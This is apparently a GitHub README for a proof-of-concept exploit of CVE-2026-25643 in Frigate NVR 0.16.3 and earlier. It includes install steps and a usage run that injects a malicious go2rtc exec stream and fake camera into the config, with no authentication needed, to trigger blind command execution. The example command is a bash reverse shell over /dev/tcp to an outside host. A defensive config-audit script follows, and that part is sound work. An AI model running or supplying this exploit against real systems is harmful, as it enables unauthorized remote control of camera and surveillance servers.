joshuavanderpoll/CVE-2026-25643
Blind RCE PoC for Frigate NVR ≤0.16.3, achieving remote command execution via go2rtc exec injection.
# Frigate NVR ≤ 0.16.3 Blind RCE Exploit (CVE-2026-25643) PoC

## 📜 Description

This Python exploit targets a critical configuration-manipulation vulnerability in Frigate NVR 0.16.3 and earlier (covering both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during the service restart, with no reverse shell or output capture required.

## 🛠️ Installation

### OSX/Linux

```
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

### Windows

```
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
```

## ⚙️ Usage

```
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

Target : http://localhost:5001
Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)
============================================================
Payload sent! Command should execute during go2rtc init / camera probe.
Keep in mind:
• Output is NOT captured (blind execution)
• Command runs as the user/frigate process
• Multiple executions may occur during restart
============================================================
```

## 🐋 Docker PoC

```
cd docker/
docker compose down
docker compose up -d
# You can test against --url http://127.0.0.1:5001
```

## 🕵🏼 References

- Inspired by https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

## 📢 Disclaimer

This tool is provided for educational and research purposes only. The creator accepts no responsibility for any misuse of, or damage caused by, this tool.
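
On the defensive side, the injected stream and trigger camera described above remain visible in the saved configuration. The check below is an added example and not part of this repository; it assumes the injected stream uses go2rtc's `exec:` source scheme and that the trigger camera's ffmpeg input points at the local restream of that stream, and the names `audit`, `exec_streams`, `cameras_using` and `SAMPLE` are hypothetical.

```python
from urllib.parse import urlparse

# Assumption: the injected go2rtc source uses the "exec:" scheme.
EXEC_PREFIX = "exec:"

def exec_streams(config):
    """Map go2rtc stream name -> sources that spawn a process."""
    found = {}
    streams = (config.get("go2rtc") or {}).get("streams") or {}
    for name, sources in streams.items():
        if isinstance(sources, str):  # a stream may be a string or a list
            sources = [sources]
        hits = [s for s in sources or []
                if isinstance(s, str) and s.strip().lower().startswith(EXEC_PREFIX)]
        if hits:
            found[name] = hits
    return found

def cameras_using(config, stream_names):
    """Cameras whose ffmpeg inputs read from one of the flagged streams."""
    flagged = []
    for cam, body in (config.get("cameras") or {}).items():
        inputs = ((body or {}).get("ffmpeg") or {}).get("inputs") or []
        paths = [urlparse(str(i.get("path", ""))).path.strip("/")
                 for i in inputs if isinstance(i, dict)]
        if any(p in stream_names for p in paths):
            flagged.append(cam)
    return flagged

def audit(config):
    """Audit a parsed Frigate config (dict) for exec-backed streams."""
    streams = exec_streams(config)
    return {"exec_streams": streams,
            "cameras": cameras_using(config, set(streams))}

# Constructed sample: names mirror the tool output above, command is a placeholder.
SAMPLE = {
    "go2rtc": {"streams": {
        "front": ["rtsp://192.0.2.10:554/stream1"],
        "debug_cmd": "exec:<placeholder command>",
    }},
    "cameras": {
        "front": {"ffmpeg": {"inputs": [{"path": "rtsp://127.0.0.1:8554/front"}]}},
        "trigger_exec": {"ffmpeg": {"inputs": [
            {"path": "rtsp://127.0.0.1:8554/debug_cmd"}]}},
    },
}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

An `exec:` source can be legitimate, so treat any entry you did not add yourself as the finding and compare it against the last known-good configuration.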